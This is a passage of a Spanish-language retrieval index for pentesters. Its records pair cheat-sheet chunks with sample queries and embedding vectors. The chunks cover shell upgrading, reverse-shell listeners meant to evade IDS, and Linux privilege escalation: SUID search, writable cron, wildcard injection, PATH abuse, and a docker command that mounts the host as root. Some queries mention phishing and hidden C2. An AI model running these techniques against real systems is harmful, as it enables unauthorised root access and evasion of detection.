-0.02123, -0.0142, -0.05742, 0.01303, -0.16408, -0.08969, 0.01148, -0.13042, 0.13541, -0.02687, 0.00829, 0.00729, 0.013, 0.12246, 0.09941, 0.01138, -0.0993, -0.07344, -0.04808, -0.09498, 0.00892, -0.10727, -0.0618, 0.04266, 0.07504, 0.02303, -0.07781, -0.02685, -0.07299, -0.00943, -0.01104, 0.02333, 0.16282, 0.01151, 0.0264, 0.04671, -0.14618, -0.04093, 0.07973, -0.00651, 0.03035, -0.11976, -0.07381, -0.05414, -0.05166, 0.04409, -0.05107, 0.02151, -0.04791, -0.00928, 0.02748, 0.04647, -0.05234, 0.08106, 0.06125, 0.14377, 0.03279, -0.01248, 0.00548, 0.02994, -0.13234, -0.02519, -0.10767, -0.14167, -0.09884, -0.046, 0.11592, 0.04981, -0.09834, 0.00829, 0.03252, -0.05873, 0.05539, 0.11117, 0.00065, -0.04257, 0.03513, 0.03435, -0.11411, 0.17893, 0.04663, -0.01109, 0.00324, -0.01804, -0.01183, -0.04587, -0.14356, 0.00384, -0.01466, -0.04977, -0.07802, -0.08081, -0.13896, -0.06382, 0.05928, -0.09084, -0.06778, -0.07692, -0.09481, -0.03283, 0.06004, 0.0229, 0.01514, -0.01944, -0.01545, 0.01448, -0.07218, -0.04055, -0.0517, -0.06674, -0.07983, -0.00293, 0.02901, -0.04784, -0.02444, -0.07303, 0.09531, 0.02737, 0.02014, 0.02261, 0.05276, 0.02239, -0.05201, -0.00878, -0.1228, 0.05052, -0.02533, 0.00505, -0.04487, 0.08726, -0.0631, -0.00263, -0.03379, -0.04648, 0.05314, 0.16969, 0.04178, 0.01896, -0.03325, 0.05297, -0.0016, 0.0041, -0.11973, 0.01723, 0.02776, -0.01023, -0.03086, 0.08374, -0.00428, -0.08861, -0.05146, -0.06619, -0.05387, -0.05812, 0.05112, 0.00064, -0.04027, -0.00602, -0.05516, -0.07915, -0.04688, 0.01269, 0.00803, 0.0223, 0.04644, 0.0793, -0.00472, 0.04506, -0.03714, -0.0487, -0.01828, -0.09403, -0.014, -0.09484, 0.04497, -0.00163, -0.08148, -0.04498, -0.00047, -0.09837, 0.00697, 0.0455, -0.05834, -0.005, 0.0355, 0.04787, 0.15798, -3e-05, 0.06528, -0.04503, -0.04828, 0.00475, 0.00706, -0.01025, 0.01421, -0.00756, 0.01573, 0.08696, 0.01884, 0.04322, -0.01108, -0.00689, -0.03327, 0.00248, 0.02825, -0.02159, -0.0338, 0.01406, -0.0246, 0.01119, 0.06315, 0.04125, 0.00907, -0.01379, -0.01813, -0.08697, -0.01658, -0.00384, -0.02965, -0.04921, -0.03959, -0.03051, -0.09236, 0.04632, 0.02476, -0.05449, 0.01602, 0.03689, 0.0554, -0.00553, 0.06925, -0.01544]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de shell\n\n```\n─ Shell rota = tortura ────────────────────────────────────\n python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n Ctrl+Z\n stty raw -echo; fg\n export TERM=xterm\n stty rows 40 columns 120\n (rows/cols los sacas con \"stty size\" en TU kali)\n\n─ Listener equivocado ────────────────────────────────────\n nc clΓ‘sico para Linux victim\n ncat --ssl para evitar IDS\n stty raw -echo + nc para Windows ConPtyShell\n\n─ Egress filtering ───────────────────────────────────────\n El firewall del objetivo bloquea ciertos puertos\n PRUEBA: 80, 443, 8080, 53, 4444. Si nada, ICMP shell.\n```\n\n---", "indexar": "con que puedo evitar que los sistemas de detecciΓ³n de intrusiones (IDS) me detecten cuando escucho puertos?", "v": [0.13935, -0.03384, -0.16865, -0.07243, 0.03898, -0.01286, -0.01187, -0.03973, -0.06161, 0.05598, -0.09239, 0.12177, -0.1286, -0.10577, 0.0541, -0.0641, 0.12619, 0.02822, -0.03228, -0.05809, -0.06915, -0.14386, -0.04947, 0.05464, 0.0262, 0.11654, -0.16073, 0.0258, -0.05521, -0.02888, -0.10249, 0.00261, 0.04479, 0.01623, -0.14713, -0.14306, -0.08647, 0.05608, 0.06902, 0.09018, 0.14296, 0.04415, -0.04427, -0.04651, 0.17782, -0.1213, -0.02338, -0.01423, 0.01979, -0.02491, -0.1171, 0.05691, -0.11677, -0.036, -0.06695, -0.07254, 0.08396, 0.09169, 0.09373, -0.08192, -0.08996, 0.0579, -0.04976, 0.01349, 0.03385, -0.13632, 0.00226, 0.02411, 0.02868, -0.03942, 0.01669, -0.07811, 0.0215, 0.07385, 0.05433, -0.0357, 0.05013, 0.03063, 0.09816, 0.0182, -0.03938, -0.03328, 0.00121, 0.0207, -0.01029, -0.08125, -0.06922, -0.05116, -0.00655, -0.14703, 0.04287, 0.0129, 0.04371, 0.06159, 0.02752, 0.00913, 0.03859, 0.05635, -0.12515, 0.08692, 0.01763, -0.03639, -0.12331, 0.10691, 0.00313, 0.02027, 0.01692, 0.02327, 0.10351, -0.09648, 0.08038, -0.00738, 0.01954, -0.1158, -0.066, 0.04576, 0.04563, -0.04177, 0.0069, 0.00446, -0.06403, -0.09293, -0.02489, -0.03802, 0.04822, -0.07895, -0.05377, 0.05851, -0.03165, 0.02432, 0.01343, 0.00243, -0.06687, -0.03558, -0.00102, 0.0169, -0.04335, -0.07773, -0.08405, 0.00212, -0.00018, 0.07421, 0.04517, 0.00712, 0.0423, 0.06217, -0.01187, 0.01734, -0.09765, -0.04239, -0.04802, 0.03954, -0.06573, 0.02977, -0.00276, 0.1058, 0.15828, -0.04287, 0.00543, 0.05315, 0.02182, 0.06541, -0.00731, 0.04078, 0.02195, -0.01195, 0.01658, -0.07167, 0.06952, -0.02893, -0.05038, 0.06757, -0.02211, -0.11872, -0.03901, -0.03177, -0.01045, -0.0912, 0.03257, -0.05771, -0.0744, 0.06493, -0.03685, -0.06473, 0.01441, -0.03214, -0.01506, -0.03601, 0.02011, 0.07625, 0.07544, 0.00759, -0.06135, 0.0611, -0.04343, -0.02012, 0.00831, -0.00535, -0.00726, 0.00371, -0.02525, 0.00506, 0.03179, -0.03487, 0.03157, 0.01715, -0.04057, 0.02393, 0.02817, 0.00923, 0.07629, -0.01866, 0.03892, -0.06804, -0.06607, 0.03328, -0.0402, 0.0474, -0.03996, 0.01015, 0.01001, 0.06905, 0.03321, 0.0829, -0.02934, -0.02385, 0.00138, 0.04722, 0.11233, 0.00171, 0.03327, -0.03613, -0.03676, -0.05784, -0.00762, -0.04392, -0.04312, -0.03993, -0.03845, -0.03255, 0.05922, 0.01034, 0.02163, -0.05915, 0.02932, -0.07922, -0.04145, 0.02343, 0.00648, -0.02973, -0.01202, 0.03713, 0.04497, -0.07788, 0.07845, -0.03944]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Privesc Linux β€” los 10 olvidados\n\n```\n1. SUID exΓ³ticos β†’ find / -perm -4000 2>/dev/null\n (y luego GTFOBins cada uno)\n2. sudo -l β†’ SIEMPRE primero, sin password\n3. Capabilities β†’ getcap -r / 2>/dev/null\n (cap_setuid en python/perl = root)\n4. Cron escribibles β†’ cat /etc/crontab, /var/spool/cron\n Scripts que tΓΊ puedes editar\n5. Wildcard injectionβ†’ \"tar czf /backup/* \" con file --checkpoint\n6. PATH abuse β†’ si un script SUID llama \"ps\" sin ruta\n absoluta, creas ./ps malicioso\n7. NFS no_root_squashβ†’ showmount -e ; montas y subes SUID\n8. Docker group β†’ si estΓ‘s en grupo \"docker\", eres root:\n docker run -v /:/mnt -it alpine chroot /mnt\n9. Kernel exploits β†’ ΓΊltimo recurso. DirtyCow, DirtyPipe\n (uname -a; searchsploit kernel x.x)\n10. Caps de archivo β†’ /var/backups, /etc/passwd escribible,\n /etc/shadow legible\n```\n\n---", "indexar": "quΓ© herramientas puedo usar para descubrir permisos SUID ocultos en un servidor Linux?", "v": [0.03422, 0.00766, -0.27547, -0.13791, -0.0332, -0.17626, -0.18225, -0.05724, -0.00039, -0.04948, -0.06887, -0.0711, 0.06896, -0.108, 0.0077, -0.06138, 0.10111, -0.14832, -0.0102, -0.00381, 0.05196, 0.09341, -0.10572, -0.01552, 0.0043, 0.01007, 0.15656, -0.11276, -0.05003, -0.03168, -0.10618, 0.08597, 0.05054, 0.0422, -0.07871, -0.00708, -0.02403, 0.08843, 0.03995, 0.05822, 0.11697, 0.0445, -0.03378, 0.07332, 0.00063, -0.14517, -0.03823, -0.02245, 0.01707, -0.03615, -0.01889, -0.13498, -0.18691, -0.08677, 0.0576, -0.02972, 0.16579, -0.14218, 0.05555, 0.02394, -0.16388, -0.00152, 0.00635, 0.01755, 0.04221, -0.05649, -0.02949, 0.00524, -0.0889, 0.04999, -0.02539, 0.07754, 0.0178, -0.01252, 0.0551, 0.03601, -0.07724, -0.001, 0.07037, 0.03191, 0.05626, 0.08103, -0.01998, 0.05867, -0.11263, -0.16607, 0.00536, -0.01348, -0.03999, 0.00435, 0.05437, 0.10299, -0.03187, 0.03674, 0.10336, -0.01756, 0.11537, 0.04458, -0.02739, -0.00286, 0.02262, 0.04303, -0.05707, 0.11046, -0.05165, 0.08056, 0.05294, -0.07322, 0.01283, -0.02931, 0.04524, -0.01131, -0.0311, 0.02444, -0.02813, 0.01632, 0.00604, -0.05376, -0.0113, -0.04252, -0.02653, -0.00567, 0.01815, 0.04062, 0.04179, -0.08901, -0.03638, 0.12763, -0.01724, -0.10479, 0.01838, -0.09066, -0.02531, 0.04334, -0.04582, 0.07546, 0.05602, -0.10996, -0.08052, -0.02627, 0.03329, -0.02191, -0.05007, 0.00688, 0.13469, 0.02119, 0.04175, -0.05833, -0.0331, -0.09636, 0.01769, -0.04821, 0.01385, 0.02485, -0.06516, 0.01225, -0.00532, -0.06987, -0.11542, 0.01074, -0.00234, 0.01316, -0.01443, 0.06705, -0.01259, -0.02879, -0.00038, 0.05153, 0.0026, 0.05567, 0.02316, 0.0366, 0.03822, -0.07036, 0.04607, -0.0795, -0.00688, -0.08157, -0.01421, -0.00512, -0.00137, 0.01992, -0.04509, -0.01702, 0.00556, -0.00675, 0.00587, -0.03972, -0.01895, 0.05216, 0.00783, 0.06155, 0.01099, -0.02335, 0.00412, 0.00185, 0.02439, -0.01082, -0.00966, -0.05194, -0.03236, 0.02778, -0.04764, -0.04706, 0.01608, -0.06601, -0.08604, 0.03991, -0.0094, 0.00271, 0.01585, -0.05864, 0.10757, -0.07051, 0.00222, 0.02612, -0.01666, 0.00697, -0.01169, -0.05354, 0.03934, 0.0311, 0.05961, -0.01279, 0.05008, -0.01708, 0.01319, 0.00824, 0.04067, 0.01347, 0.00176, 0.0132, -0.05924, 0.01576, -0.00196, -0.02994, 0.01882, 0.0059, -0.02611, 0.00829, -0.00333, 0.07865, 0.04285, -0.07336, -0.02996, -0.0711, -0.01497, -0.02746, -0.05656, -0.0386, -0.02002, 0.02069, 0.048, -0.04417, -0.00043, -0.00226]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Privesc Linux β€” los 10 olvidados\n\n```\n1. SUID exΓ³ticos β†’ find / -perm -4000 2>/dev/null\n (y luego GTFOBins cada uno)\n2. sudo -l β†’ SIEMPRE primero, sin password\n3. Capabilities β†’ getcap -r / 2>/dev/null\n (cap_setuid en python/perl = root)\n4. Cron escribibles β†’ cat /etc/crontab, /var/spool/cron\n Scripts que tΓΊ puedes editar\n5. Wildcard injectionβ†’ \"tar czf /backup/* \" con file --checkpoint\n6. PATH abuse β†’ si un script SUID llama \"ps\" sin ruta\n absoluta, creas ./ps malicioso\n7. NFS no_root_squashβ†’ showmount -e ; montas y subes SUID\n8. Docker group β†’ si estΓ‘s en grupo \"docker\", eres root:\n docker run -v /:/mnt -it alpine chroot /mnt\n9. Kernel exploits β†’ ΓΊltimo recurso. DirtyCow, DirtyPipe\n (uname -a; searchsploit kernel x.x)\n10. Caps de archivo β†’ /var/backups, /etc/passwd escribible,\n /etc/shadow legible\n```\n\n---", "indexar": "cΓ³mo verifico si tengo capacidades de root accesibles mediante scripts cron o PATH abuse?", "v": [-0.00859, 0.02209, -0.26616, -0.20519, 0.11145, -0.08742, 0.04266, -0.01816, -0.07999, 0.06372, -0.09383, 0.08371, -0.02994, -0.03575, 0.13265, -0.09549, -0.07777, -0.06831, 0.04066, 0.08055, -0.04321, -0.12415, -0.05499, 0.05993, 0.0164, 0.10345, 0.08355, 0.11335, -0.08698, -0.01995, 0.04223, 0.05932, 0.05357, 0.08762, -0.11442, -0.0735, -0.03268, 0.07772, 0.07306, 0.21844, -0.04969, -0.08955, -0.0583, 0.16884, 0.09589, -0.09142, 0.00745, 0.01468, -0.04953, -0.0292, -0.07431, -0.07639, -0.13267, -0.02207, -0.08319, 0.00982, 0.04801, -0.14767, -0.01685, 0.06825, -0.05231, -0.03419, 0.05203, 0.00715, 0.0579, 0.00118, 0.06335, -0.02951, -0.10378, 0.03181, -0.07463, 0.02715, -0.03457, 0.0764, 0.08415, -0.01261, -0.06928, -0.07155, 0.03829, -0.07648, 0.03602, 0.00158, -0.03203, 0.05447, -0.18841, -0.00947, -0.06685, -0.02198, -0.01669, -0.09099, 0.07584, -0.01764, -0.02818, -0.09259, -0.00604, -0.0202, 0.0057, -0.03801, 0.04586, 0.01759, -0.07435, -0.02891, -0.00785, 0.0797, 0.03924, 0.02304, 0.06626, 0.02547, 0.08596, -0.03978, 0.01353, 0.06783, -0.10391, -0.0093, -0.02681, 0.10797, -0.10525, -0.06005, 0.0684, -0.07273, -0.04582, -0.01651, -0.08086, -0.03404, 0.03163, -0.04723, 0.07067, 0.00619, 0.02372, 0.05268, -0.04584, 0.08575, 0.00554, -0.00911, -0.04376, 0.06254, 0.09937, -0.0197, -0.06129, -0.04629, 0.0331, 0.03169, 0.05846, 0.0317, 0.0714, -0.03964, -0.12377, 0.00056, -0.07057, 0.00631, -0.01672, -0.03821, -0.00901, 0.07812, -0.02904, -0.06491, -0.0098, -0.01705, -0.00205, 0.01981, -0.05016, -0.10431, -0.07511, 0.03829, 0.03482, -0.02192, 0.01984, 0.01506, 0.01234, 0.00476, -0.07118, 0.05986, 0.02781, -0.00644, -0.00625, -0.08464, -0.01432, -0.06605, -0.04374, 0.00484, 0.01541, 0.00055, -0.05247, -0.00785, -0.09668, -0.03314, 0.03313, 0.0159, 0.05777, -0.02076, 0.01343, 0.01855, 0.05156, 0.00329, 0.04605, 0.03151, -0.09993, -0.01411, -0.05918, 0.00332, -0.02879, 0.08614, 0.00706, -0.01899, 0.06878, 0.02202, 0.02993, -0.06793, -0.06838, -0.01743, 0.0874, 0.00178, 0.07381, 0.04864, -0.03004, -0.00366, -0.04429, -0.01199, 0.03694, -0.07596, -0.04896, 0.053, 0.05678, -0.01197, -0.04618, -0.05176, 0.04474, 0.00287, 0.02779, 0.05871, 0.01512, 0.04235, -0.04777, -0.02343, 0.02263, -0.04956, 0.00343, 0.01292, 0.02545, -0.03326, -0.00905, 0.04379, -0.0306, -0.02001, -0.01879, -0.02649, -0.03433, 0.01343, -0.00545, -0.03137, 0.06107, 0.01325, 0.04007, -0.05547, -0.05047, -0.03617]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Privesc Linux β€” los 10 olvidados\n\n```\n1. SUID exΓ³ticos β†’ find / -perm -4000 2>/dev/null\n (y luego GTFOBins cada uno)\n2. sudo -l β†’ SIEMPRE primero, sin password\n3. Capabilities β†’ getcap -r / 2>/dev/null\n (cap_setuid en python/perl = root)\n4. Cron escribibles β†’ cat /etc/crontab, /var/spool/cron\n Scripts que tΓΊ puedes editar\n5. Wildcard injectionβ†’ \"tar czf /backup/* \" con file --checkpoint\n6. PATH abuse β†’ si un script SUID llama \"ps\" sin ruta\n absoluta, creas ./ps malicioso\n7. NFS no_root_squashβ†’ showmount -e ; montas y subes SUID\n8. Docker group β†’ si estΓ‘s en grupo \"docker\", eres root:\n docker run -v /:/mnt -it alpine chroot /mnt\n9. Kernel exploits β†’ ΓΊltimo recurso. DirtyCow, DirtyPipe\n (uname -a; searchsploit kernel x.x)\n10. Caps de archivo β†’ /var/backups, /etc/passwd escribible,\n /etc/shadow legible\n```\n\n---", "indexar": "cual es el mejor enfoque paso a paso para auditar vectores de privilegio como NFS, Docker o inyecciΓ³n de comodines?", "v": [0.21708, -0.08476, -0.14386, 0.00824, 0.07745, -0.003, 0.11924, -0.11452, -0.08498, -0.05208, -0.04996, -0.07609, -0.21747, -0.01518, 0.01906, 0.0161, 0.17648, -0.10082, -0.02393, 0.11613, 0.02108, -0.14713, -0.02371, 0.01121, -0.00947, 0.05056, 0.01081, 0.00824, -0.00434, 0.03304, 0.01089, -0.03071, 0.06539, -0.02905, -0.08438, -0.08778, -0.01358, 0.08049, 0.02677, 0.09251, 0.06291, 0.11515, -0.10548, 0.06052, 0.09926, -0.12912, -0.04758, 0.06167, 0.07071, -0.09609, 0.07341, 0.03437, -0.02835, 0.02219, -0.11085, 0.02779, -0.00517, 0.08142, 0.02413, 0.04654, -0.08208, -0.02216, 0.00611, -0.12995, -0.0782, -0.20996, -0.04722, -0.02357, -0.03048, -0.03262, -0.04394, -0.01483, 0.0794, 0.01425, -0.00721, 0.03908, -0.00104, 0.05871, -0.02936, 0.0391, 0.0643, -0.11922, -0.15612, 0.12613, -0.02572, 0.04444, 0.02844, 0.01045, -0.0237, -0.00513, 0.02775, -0.06297, 0.05379, -0.06288, -0.04385, -0.00906, 0.0285, 0.07326, 0.075, -0.00369, 0.11672, -0.08108, -0.09996, 0.1382, 0.08814, 0.07859, 0.02145, -0.04642, -0.02275, -0.0637, -0.01777, -0.0232, -0.05518, -0.1214, -0.04397, -0.01471, -0.04369, -0.00504, -0.02529, -0.07255, -0.00525, -0.03921, -0.11047, -0.04213, -0.04441, -0.05529, -0.01978, -0.0249, 0.02054, 0.07389, 0.00705, 0.00224, -0.0898, 0.02058, -0.00798, 0.02679, -0.0104, -0.03238, -0.03387, -0.04428, 0.02774, 0.04733, 0.11353, -0.00628, 0.04224, 0.01528, 0.04324, -0.08365, -0.10585, 0.0108, -0.01453, 0.00408, 0.04547, 0.00971, -0.09559, -0.03713, -0.01762, 0.00472, 0.0089, 0.07005, 0.01429, 0.00373, 0.01711, -0.00277, 0.05236, -0.03028, -0.05089, -0.09362, -0.04742, -0.0542, -0.05665, -0.02951, -0.09813, 0.02914, 0.00709, -0.06227, -0.00657, -0.05372, 0.13191, -0.02024, -0.01682, 0.03459, 0.00245, -0.00769, 0.00328, -0.06545, 0.00505, 0.03153, 0.1098, 0.04811, 0.05546, 0.02143, 0.00896, -0.08446, 0.03115, -0.06929, -0.02369, -0.03313, -0.01769, -0.00039, -0.03073, -0.01141, -0.01294, -0.05084, 0.02333, 0.04121, -0.03084, 0.03553, -0.078, 0.07026, 0.02953, -0.03475, 0.05951, -0.04411, -0.05057, -0.01309, 0.05038, -0.04249, -0.04254, 0.00814, 0.02207, 0.01353, 0.06694, -0.02859, -0.01881, -0.06983, 0.04314, 0.01326, -0.01818, 0.07362, -0.05049, -0.0006, -0.02849, -0.03987, 0.04192, 0.06173, -0.00195, 0.00415, -0.01594, -0.0744, 0.09545, 0.0387, -0.05316, -0.03415, 0.00519, -0.03093, -0.1102, 0.02121, -0.01258, -0.03214, 0.05912, 0.06164, 0.08996, -0.01553, 0.02134, -0.03036]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Privesc Windows β€” los 10 olvidados", "indexar": "que programa hay para montar un ataque de phishing en Windows?", "v": [0.02568, 0.03444, -0.07343, -0.16163, -0.07806, -0.05487, -0.08504, -0.03739, -0.05911, -0.05749, 0.16975, 4e-05, -0.0331, -0.04543, -0.00155, -0.06801, -0.01885, -0.03934, 0.14715, -0.03745, -0.08776, 0.05597, -0.02736, -0.01898, -0.06092, 0.10172, 0.00162, 0.06203, -0.12349, -0.04885, 0.1654, -0.02691, 0.02272, 0.05529, 0.0267, 0.03152, 0.0093, -0.02671, 0.13963, 0.07841, 0.03969, 0.06307, -0.13428, 0.03806, 0.08568, -0.10183, 0.0638, -0.09209, 0.19736, 0.03764, 0.08741, 0.03969, -0.11994, -0.00846, 0.02693, -0.07231, 0.00224, -0.16656, 0.01942, -0.01361, -0.07675, 0.12163, -0.06409, -0.01522, 0.02527, -0.0142, 0.05478, 0.0575, -0.069, 0.05121, 0.04251, -0.08357, -0.02139, 0.06982, -0.00962, 0.02072, 0.00523, 0.03634, 0.07394, -0.03929, -0.00646, -0.01091, -0.014, 0.10519, -0.08915, -0.08254, 0.00217, -0.05257, -0.03332, -0.05032, 0.03243, 0.04856, -0.05416, 0.02589, -0.02552, -0.0926, 0.1059, -0.08063, 0.00485, 0.06616, -0.12661, -0.13586, -0.04995, 0.17339, 0.01182, 0.04392, 0.00695, -0.06552, 0.00495, -0.03401, -0.04477, 0.02945, -0.09248, -0.05976, -0.04683, -0.11746, -0.02913, -0.00026, 0.11433, 0.01406, -0.11502, 0.06, -0.06418, 0.09656, 0.05483, -0.01633, -0.00298, 0.08111, -0.14384, 0.03513, 0.06268, 0.00123, -0.04321, 0.02284, -0.10784, 0.05355, 0.01287, -0.11944, -0.02496, 0.004, 0.09808, 0.0833, -0.0119, 0.0341, -0.0067, 0.00993, 0.05515, -0.04233, -0.0762, 0.03107, 0.01711, 0.08068, -0.01329, 0.01729, -0.09045, -0.00622, -0.01334, 0.05167, 0.00504, 0.07666, 0.01773, 0.0611, -0.04038, 0.00109, 0.04109, -0.01172, -0.02017, 0.03992, 0.1236, 0.02641, -0.01935, 0.1421, 0.00778, -0.03647, 0.02011, 0.03026, 0.02626, -0.00023, -0.01033, -0.0298, -0.05929, -0.02376, 0.08168, 0.00371, -0.0596, 0.0278, 0.00173, 0.11216, -0.03772, -1e-05, -0.04483, -0.02606, -0.03119, 0.06106, 0.03417, -0.06724, -0.07139, -0.01905, 0.07646, -0.00558, -0.03688, -0.0394, -0.04825, 0.01687, 0.04344, 0.10229, -0.03173, -0.06637, 0.03454, 0.09607, 0.0625, -0.02915, -0.00405, -0.04425, -0.04541, -0.01116, 0.04283, 0.02673, 0.0238, 0.06188, -0.01066, 0.01633, 0.04204, 0.08127, -0.04914, -0.08318, -0.07234, -0.00507, 0.0288, 0.00866, 0.00424, -0.05079, 0.0173, -0.03504, 0.00277, -0.01824, 0.03142, -0.01872, -0.06025, -0.05459, -0.08933, 0.02142, 0.00606, -0.08494, -0.03833, -0.0194, -0.01255, 0.04708, 0.00401, -0.01651, -0.0217, 0.01956, -0.04138, -0.03407, 0.00372, 0.02172]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Privesc Windows β€” los 10 olvidados", "indexar": "con que puedo crear una red C2 oculta para Windows?", "v": [-0.01125, -0.01518, -0.10659, -0.0552, -0.03109, -0.07324, -0.09571, 0.08881, 0.01439, -0.15597, -0.05369, -0.2381, -0.04784, -0.13766, -0.02545, -0.01445, -0.04244, -0.0073, 0.0355, 0.01863, 0.02682, -0.12226, -0.05819, 0.00392, 0.06728, 0.05037, 0.07533, 0.00362, -0.04452, 0.00731, -0.00621, 0.04556, -0.0111, 0.042, -0.02158, 0.09682, -0.02732, -0.00412, 0.01441, 0.06192, -0.05029, 0.1289, -0.00829, 0.18325, 0.06697, -0.01798, 0.05496, -0.09663, -0.01706, 0.04589, -0.06965, -0.1416, -0.19573, -0.12568, 0.04268, -0.12805, 0.03556, -0.03472, -0.01564, -0.02362, 0.05811, 0.16102, -0.07712, 0.10003, -0.03187, -0.01405, -0.04445, 0.02646, 0.02555, 0.14151, -0.04241, -0.01855, -0.00762, -0.01407, 0.11418, 0.08754, -0.11285, -0.11939, 0.09131, -0.04387, 0.00188, 0.13559, -0.03529, -0.03059, 0.06842, -0.10096, -0.01746, -0.01672, -0.05103, -0.13414, 0.05368, -0.09033, -0.04564, 0.07174, 0.06539, -0.03678, 0.06119, -0.07234, -0.062, 0.04484, -0.07773, -0.00021, -0.09212, 0.08289, -0.00888, 0.06636, 0.06227, -0.06526, -0.02839, -0.00281, 0.07358, 0.02831, -0.04516, -0.01623, 0.02288, -0.0307, 0.03864, -0.03459, 0.02188, 0.08779, -0.07155, -0.01904, -0.17285, 0.00369, -0.02736, -0.06736, -0.12048, 0.06662, -0.1126, 0.03857, -0.06363, 0.0029, -0.01083, -0.02762, -0.11276, 0.02818, -0.02716, -0.05415, 0.01279, 0.00331, 0.06169, 0.06266, -0.02729, -0.09702, 0.04049, 0.03734, 0.04466, 0.0335, -0.03423, 0.02739, 0.03768, -0.01654, 0.03567, -0.01441, -0.10312, 0.11386, 0.03273, 0.09966, 0.06263, 0.01383, 2e-05, 0.06955, -0.06244, -0.05695, -0.04002, -0.03372, -0.06094, -0.01711, 0.03625, -0.07264, -0.06604, 0.05152, -0.01312, -0.07374, 0.02542, -0.05919, 0.06278, -0.06698, 0.0149, -0.01581, -0.02496, -0.00495, 0.02134, 0.02697, 0.00187, -0.06965, 0.00713, -0.02466, -0.00643, -0.02136, -0.0726, -0.03107, 0.10368, -0.03689, -0.04904, -0.01188, 0.0515, -0.06259, 0.09307, -0.03825, -0.07939, 0.01186, -0.04976, -0.00817, 0.0418, 0.01671, -0.00059, 0.06414, 0.04923, 0.06723, 0.03928, -0.01956, 0.01035, -0.08558, -0.02775, 0.02278, 0.01893, -0.00319, 0.01789, -0.00474, 0.05862, -0.02025, -0.00761, 0.02443, 0.0349, 0.00721, -0.08547, 0.01502, 0.01516, 0.05942, 0.00437, 0.01882, 0.00575, 0.00749, 0.02675, 0.0037, 0.02075, -0.04139, -0.0463, 0.0169, -0.00809, 0.03855, -0.00683, -0.04956, 0.00877, -0.05614, -0.01388, 0.01895, -0.02281, -0.10631, -0.05638, -0.01092, 0.04504, -0.05943, -0.0025, 0.02223]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Privesc Windows β€” los 10 olvidados", "indexar": "cuales son las herramientas para escaneo de puertos remotos?", "v": [0.0979, -0.09098, -0.13723, -0.07237, 0.06051, -0.03598, 0.1576, -0.10836, -0.09264, -0.03095, -0.15522, 0.05487, 0.10112, -0.06166, 0.14927, -0.00543, 0.00494, 0.05633, -0.00146, 0.09738, -0.06771, -0.04623, -0.02423, 0.06992, -0.03514, -0.0062, 0.08715, 0.0637, -0.12604, 0.08325, 0.04816, 0.04761, 0.08337, -0.02518, -0.03369, -0.09964, 0.04762, 0.05124, 0.04463, 0.05967, 0.08204, 0.01196, -0.13498, -0.15713, 0.09643, -0.10464, -0.06539, -0.02268, 0.04643, -0.01183, -0.06975, -0.04764, -0.06225, -0.02595, -0.01265, -0.11352, 0.24357, 0.0245, 0.04115, -0.09673, -0.09246, 0.04562, 0.01116, -0.00943, -0.06788, -0.10481, -0.08375, -0.03638, -0.1648, 0.02712, -0.09577, -0.01597, 0.08488, 0.05337, -0.06859, -0.04826, -0.04305, 0.04526, 0.07118, -0.03379, -0.03999, -0.01093, -0.08787, -0.09287, -0.16043, -0.10515, 0.00833, 0.01723, 0.00473, -0.13014, 0.05905, -0.0746, 0.01389, 0.05316, 0.01747, 0.02765, 0.03634, 0.01869, -0.00382, 0.01272, 0.01863, 0.0424, -0.01998, 0.07965, -0.04427, 0.0282, 0.02769, -0.05472, 0.02691, 0.04637, 0.01523, 0.08896, 0.04975, -0.05257, -0.0109, -0.02582, -0.03345, -0.12233, 0.04301, -0.01971, 0.005, -0.06615, -0.01512, 0.00804, 0.02055, -0.01656, -0.06218, 0.07992, 0.0843, -0.00907, 0.02389, -0.0797, -0.06942, -0.08278, -0.05337, -0.06598, 0.01775, -0.13849, 0.00225, -0.12419, -0.04753, 0.06619, -0.05824, -0.04885, 0.08085, 0.04058, 0.01805, -0.00259, -0.04349, -0.01173, 0.00462, 0.0093, -0.04173, 0.04293, -0.10517, 0.01343, -0.00149, -0.04829, -0.07425, 0.06048, -0.00278, -0.02204, -0.0227, -0.01634, 0.03215, -0.07397, -0.01064, 0.01799, 0.02369, 0.02195, -0.07679, 0.15816, -0.04622, -0.05373, -0.03913, -0.00233, -0.02154, -0.05166, -0.04927, -0.03138, -0.08241, 0.10236, -0.0221, -0.06246, 0.03601, -0.02501, -0.0018, -0.07091, 0.01612, 0.09458, 0.00659, 0.00342, -0.06955, -0.04487, -0.0173, 0.00797, -0.05877, 0.0263, 0.03108, -0.02198, -0.03895, -0.01025, 0.04837, -0.06936, 0.06793, 0.03448, -0.08274, 0.00858, -0.00188, 0.08062, 0.0161, -0.0609, 0.05512, -0.04022, -0.01271, -0.02509, -0.03478, -0.0291, 0.02232, 0.07127, -0.0398, 0.01349, 0.00999, -0.01716, -0.02678, 0.08377, 0.06929, 0.04021, 0.05949, -0.00179, 0.02253, -0.01281, -0.04345, -0.05603, 0.00612, 0.00209, 0.00946, -0.04765, -0.00161, 0.01782, -0.01146, 0.03643, -0.00874, -0.0362, -0.02752, -0.08254, -0.07302, 0.03787, -0.02361, -0.02222, -0.04669, 0.04463, 0.04858, -0.02146, -0.00183, -0.06112]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": 